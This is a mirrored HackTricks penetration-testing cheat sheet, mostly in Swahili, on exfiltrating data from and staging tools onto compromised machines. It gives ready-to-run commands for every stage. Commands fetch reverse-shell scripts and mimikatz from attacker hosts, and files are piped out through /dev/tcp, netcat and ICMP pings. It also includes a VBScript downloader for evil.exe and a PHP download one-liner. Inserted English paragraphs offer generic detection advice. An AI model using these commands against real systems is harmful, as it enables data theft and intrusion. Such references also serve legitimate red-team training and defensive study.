mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
400 lines
15 KiB
Markdown
400 lines
15 KiB
Markdown
# Kufyonza
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
**Kikundi cha Usalama cha Kujitahidi Kwa Bidii**
|
|
|
|
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
|
|
|
{% embed url="https://discord.gg/tryhardsecurity" %}
|
|
|
|
***
|
|
|
|
## Vyanzo vya kawaida vilivyoorodheshwa kwa ajili ya kufyonza taarifa
|
|
|
|
Angalia [https://lots-project.com/](https://lots-project.com/) kupata vyanzo vya kawaida vilivyoorodheshwa ambavyo vinaweza kutumiwa vibaya
|
|
|
|
## Nakili\&Banda la Msingi wa 64
|
|
|
|
**Linux**
|
|
```bash
|
|
base64 -w0 <file> #Encode file
|
|
base64 -d file #Decode file
|
|
```
|
|
**Windows**
|
|
```
|
|
certutil -encode payload.dll payload.b64
|
|
certutil -decode payload.b64 payload.dll
|
|
```
|
|
## HTTP
|
|
|
|
**Linux**
|
|
```bash
|
|
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
|
|
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
|
|
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
|
|
fetch 10.10.14.14:8000/shell.py #FreeBSD
|
|
```
|
|
**Windows**
|
|
```bash
|
|
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
|
|
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
|
|
|
|
#PS
|
|
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
|
|
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
|
|
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
|
|
|
|
Import-Module BitsTransfer
|
|
Start-BitsTransfer -Source $url -Destination $output
|
|
#OR
|
|
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
|
```
|
|
### Pakia faili
|
|
|
|
* [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
|
* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
|
|
* Moduli wa Python [uploadserver](https://pypi.org/project/uploadserver/):
|
|
```bash
|
|
# Listen to files
|
|
python3 -m pip install --user uploadserver
|
|
python3 -m uploadserver
|
|
# With basic auth:
|
|
# python3 -m uploadserver --basic-auth hello:world
|
|
|
|
# Send a file
|
|
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
|
|
# With basic auth:
|
|
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
|
|
```
|
|
### **Seva ya HTTPS**
|
|
```python
|
|
# from https://gist.github.com/dergachev/7028596
|
|
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
|
|
# generate server.xml with the following command:
|
|
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
|
|
# run as follows:
|
|
# python simple-https-server.py
|
|
# then in your browser, visit:
|
|
# https://localhost:443
|
|
|
|
### PYTHON 2
|
|
import BaseHTTPServer, SimpleHTTPServer
|
|
import ssl
|
|
|
|
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
|
|
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
|
|
httpd.serve_forever()
|
|
###
|
|
|
|
### PYTHON3
|
|
from http.server import HTTPServer, BaseHTTPRequestHandler
|
|
import ssl
|
|
|
|
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
|
|
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
|
|
httpd.serve_forever()
|
|
###
|
|
|
|
### USING FLASK
|
|
from flask import Flask, redirect, request
|
|
from urllib.parse import quote
|
|
app = Flask(__name__)
|
|
@app.route('/')
|
|
def root():
|
|
print(request.get_json())
|
|
return "OK"
|
|
if __name__ == "__main__":
|
|
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
|
|
###
|
|
```
|
|
## FTP
|
|
|
|
### Seva ya FTP (python)
|
|
```bash
|
|
pip3 install pyftpdlib
|
|
python3 -m pyftpdlib -p 21
|
|
```
|
|
### Seva ya FTP (NodeJS)
|
|
```
|
|
sudo npm install -g ftp-srv --save
|
|
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
|
```
|
|
### Seva ya FTP (pure-ftp)
|
|
```bash
|
|
apt-get update && apt-get install pure-ftp
|
|
```
|
|
|
|
```bash
|
|
#Run the following script to configure the FTP server
|
|
#!/bin/bash
|
|
groupadd ftpgroup
|
|
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
|
|
pure-pwd useradd fusr -u ftpuser -d /ftphome
|
|
pure-pw mkdb
|
|
cd /etc/pure-ftpd/auth/
|
|
ln -s ../conf/PureDB 60pdb
|
|
mkdir -p /ftphome
|
|
chown -R ftpuser:ftpgroup /ftphome/
|
|
/etc/init.d/pure-ftpd restart
|
|
```
|
|
### **Mteja wa Windows**
|
|
```bash
|
|
#Work well with python. With pure-ftp use fusr:ftp
|
|
echo open 10.11.0.41 21 > ftp.txt
|
|
echo USER anonymous >> ftp.txt
|
|
echo anonymous >> ftp.txt
|
|
echo bin >> ftp.txt
|
|
echo GET mimikatz.exe >> ftp.txt
|
|
echo bye >> ftp.txt
|
|
ftp -n -v -s:ftp.txt
|
|
```
|
|
## SMB
|
|
|
|
Kali kama server
|
|
```bash
|
|
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
|
|
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
|
|
#For new Win10 versions
|
|
impacket-smbserver -smb2support -user test -password test test `pwd`
|
|
```
|
|
Au unaweza kuunda smb share **kwa kutumia samba**:
|
|
```bash
|
|
apt-get install samba
|
|
mkdir /tmp/smb
|
|
chmod 777 /tmp/smb
|
|
#Add to the end of /etc/samba/smb.conf this:
|
|
[public]
|
|
comment = Samba on Ubuntu
|
|
path = /tmp/smb
|
|
read only = no
|
|
browsable = yes
|
|
guest ok = Yes
|
|
#Start samba
|
|
service smbd restart
|
|
```
|
|
### Exfiltration Techniques on Windows
|
|
|
|
#### Exfiltration Over C2 Channels
|
|
When exfiltrating data over command and control (C2) channels, an attacker can leverage existing C2 infrastructure to blend in with legitimate traffic. This can include using encrypted channels, steganography, or other obfuscation techniques to avoid detection.
|
|
|
|
#### Exfiltration Over Alternative Protocols
|
|
Attackers can also exfiltrate data using alternative protocols such as DNS, ICMP, or HTTP. By encoding data within the protocol traffic, an attacker can bypass network security controls that may only be inspecting specific protocols.
|
|
|
|
#### Exfiltration Over Trusted Protocols
|
|
Utilizing trusted protocols like HTTPS or DNS can help an attacker blend in with normal network traffic. By abusing these protocols to exfiltrate data, an attacker can avoid raising suspicion from security monitoring tools.
|
|
|
|
#### Exfiltration Over Encrypted Channels
|
|
Encrypting exfiltrated data can help evade detection by security tools that are not able to inspect encrypted traffic. By using encryption, an attacker can make it more challenging for defenders to identify and block exfiltration attempts.
|
|
```bash
|
|
CMD-Wind> \\10.10.14.14\path\to\exe
|
|
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
|
|
|
|
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
|
|
WindPS-2> cd new_disk:
|
|
```
|
|
## SCP
|
|
|
|
Mshambuliaji lazima awe na SSHd inayofanya kazi.
|
|
```bash
|
|
scp <username>@<Attacker_IP>:<directory>/<filename>
|
|
```
|
|
## SSHFS
|
|
|
|
Ikiwa muathiriwa ana SSH, mkaidi anaweza kufunga saraka kutoka kwa muathiriwa kwenda kwa mkaidi.
|
|
```bash
|
|
sudo apt-get install sshfs
|
|
sudo mkdir /mnt/sshfs
|
|
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
|
```
|
|
## NC
|
|
|
|
### Exfiltration
|
|
|
|
#### Overview
|
|
|
|
Exfiltration is the unauthorized transfer of data from a target. This can be achieved through various methods, such as:
|
|
|
|
- **Email**: Sending sensitive data as email attachments.
|
|
- **FTP**: Transferring data using File Transfer Protocol.
|
|
- **DNS**: Sending data through DNS requests.
|
|
- **HTTP/HTTPS**: Using HTTP or HTTPS protocols to exfiltrate data.
|
|
- **Steganography**: Hiding data within other files to avoid detection.
|
|
- **Physical**: Removing data physically from a target location.
|
|
|
|
#### Detection
|
|
|
|
Detecting exfiltration can be challenging due to the covert nature of the activity. Some common detection methods include:
|
|
|
|
- **Network Monitoring**: Monitoring network traffic for unusual patterns.
|
|
- **Endpoint Monitoring**: Monitoring endpoint devices for unauthorized data transfers.
|
|
- **Data Loss Prevention (DLP)**: Using DLP solutions to detect and prevent data exfiltration.
|
|
- **Behavioral Analytics**: Analyzing user behavior to identify suspicious activities.
|
|
- **Encryption**: Implementing encryption to protect data from being exfiltrated.
|
|
|
|
#### Prevention
|
|
|
|
Preventing exfiltration requires a multi-layered approach to security. Some prevention techniques include:
|
|
|
|
- **Access Control**: Limiting access to sensitive data to authorized personnel only.
|
|
- **Network Segmentation**: Segmenting networks to prevent lateral movement of attackers.
|
|
- **User Training**: Educating users about the risks of data exfiltration and how to prevent it.
|
|
- **Security Policies**: Implementing strict security policies to govern data handling practices.
|
|
- **Security Tools**: Deploying security tools such as firewalls, IDS/IPS, and SIEM solutions to detect and prevent exfiltration attempts.
|
|
|
|
By understanding exfiltration techniques and implementing appropriate detection and prevention measures, organizations can better protect their data from unauthorized access and transfer.
|
|
```bash
|
|
nc -lvnp 4444 > new_file
|
|
nc -vn <IP> 4444 < exfil_file
|
|
```
|
|
## /dev/tcp
|
|
|
|
### Pakua faili kutoka kwa muathiriwa
|
|
```bash
|
|
nc -lvnp 80 > file #Inside attacker
|
|
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
|
```
|
|
### Pakia faili kwa muathiriwa
|
|
```bash
|
|
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
|
# Inside victim
|
|
exec 6< /dev/tcp/10.10.10.10/4444
|
|
cat <&6 > file.txt
|
|
```
|
|
Asante kwa **@BinaryShadow\_**
|
|
|
|
## **ICMP**
|
|
```bash
|
|
# To exfiltrate the content of a file via pings you can do:
|
|
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
|
|
#This will 4bytes per ping packet (you could probably increase this until 16)
|
|
```
|
|
|
|
```python
|
|
from scapy.all import *
|
|
#This is ippsec receiver created in the HTB machine Mischief
|
|
def process_packet(pkt):
|
|
if pkt.haslayer(ICMP):
|
|
if pkt[ICMP].type == 0:
|
|
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
|
|
print(f"{data.decode('utf-8')}", flush=True, end="")
|
|
|
|
sniff(iface="tun0", prn=process_packet)
|
|
```
|
|
## **SMTP**
|
|
|
|
Ikiwa unaweza kutuma data kwa seva ya SMTP, unaweza kuunda SMTP kupokea data hiyo kwa kutumia python:
|
|
```bash
|
|
sudo python -m smtpd -n -c DebuggingServer :25
|
|
```
|
|
## TFTP
|
|
|
|
Kwa chaguo-msingi katika XP na 2003 (katika mingine inahitaji kuongezwa wazi wakati wa usakinishaji)
|
|
|
|
Katika Kali, **anzisha seva ya TFTP**:
|
|
```bash
|
|
#I didn't get this options working and I prefer the python option
|
|
mkdir /tftp
|
|
atftpd --daemon --port 69 /tftp
|
|
cp /path/tp/nc.exe /tftp
|
|
```
|
|
**Server ya TFTP kwa kutumia python:**
|
|
```bash
|
|
pip install ptftpd
|
|
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
|
|
```
|
|
Katika **mwendwa**, unganisha kwenye seva ya Kali:
|
|
```bash
|
|
tftp -i <KALI-IP> get nc.exe
|
|
```
|
|
## PHP
|
|
|
|
Pakua faili kwa PHP oneliner:
|
|
```bash
|
|
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
|
```
|
|
## VBScript
|
|
|
|
VBScript ni lugha ya programu inayotumika sana kwa maendeleo ya skripti za Windows. Inaweza kutumika kwa ufanisi kutekeleza shughuli za uhamishaji wa data kwa njia ya exfiltration.
|
|
```bash
|
|
Attacker> python -m SimpleHTTPServer 80
|
|
```
|
|
**Mnajisi**
|
|
```bash
|
|
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
|
|
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
|
|
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
|
|
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
|
|
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
|
|
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
|
|
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
|
|
echo Err.Clear >> wget.vbs
|
|
echo Set http = Nothing >> wget.vbs
|
|
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
|
|
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
|
|
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
|
|
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
|
|
echo http.Open "GET", strURL, False >> wget.vbs
|
|
echo http.Send >> wget.vbs
|
|
echo varByteArray = http.ResponseBody >> wget.vbs
|
|
echo Set http = Nothing >> wget.vbs
|
|
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
|
|
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
|
|
echo strData = "" >> wget.vbs
|
|
echo strBuffer = "" >> wget.vbs
|
|
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
|
|
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
|
|
echo Next >> wget.vbs
|
|
echo ts.Close >> wget.vbs
|
|
```
|
|
|
|
```bash
|
|
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
|
```
|
|
## Debug.exe
|
|
|
|
Programu ya `debug.exe` sio tu inaruhusu ukaguzi wa binaries lakini pia ina **uwezo wa kujenga upya kutoka hex**. Hii inamaanisha kwamba kwa kutoa hex ya binary, `debug.exe` inaweza kuzalisha faili ya binary. Hata hivyo, ni muhimu kuzingatia kwamba debug.exe ina **kizuizi cha kuunda faili hadi 64 kb in size**.
|
|
```bash
|
|
# Reduce the size
|
|
upx -9 nc.exe
|
|
wine exe2bat.exe nc.exe nc.txt
|
|
```
|
|
Kisha nakili na ushirikishe maudhui kwenye windows-shell na faili inayoitwa nc.exe itaundwa.
|
|
|
|
* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
|
|
|
|
## DNS
|
|
|
|
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
|
|
|
|
**Kikundi cha Usalama cha Kujaribu Kwa Bidii**
|
|
|
|
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
|
|
|
{% embed url="https://discord.gg/tryhardsecurity" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|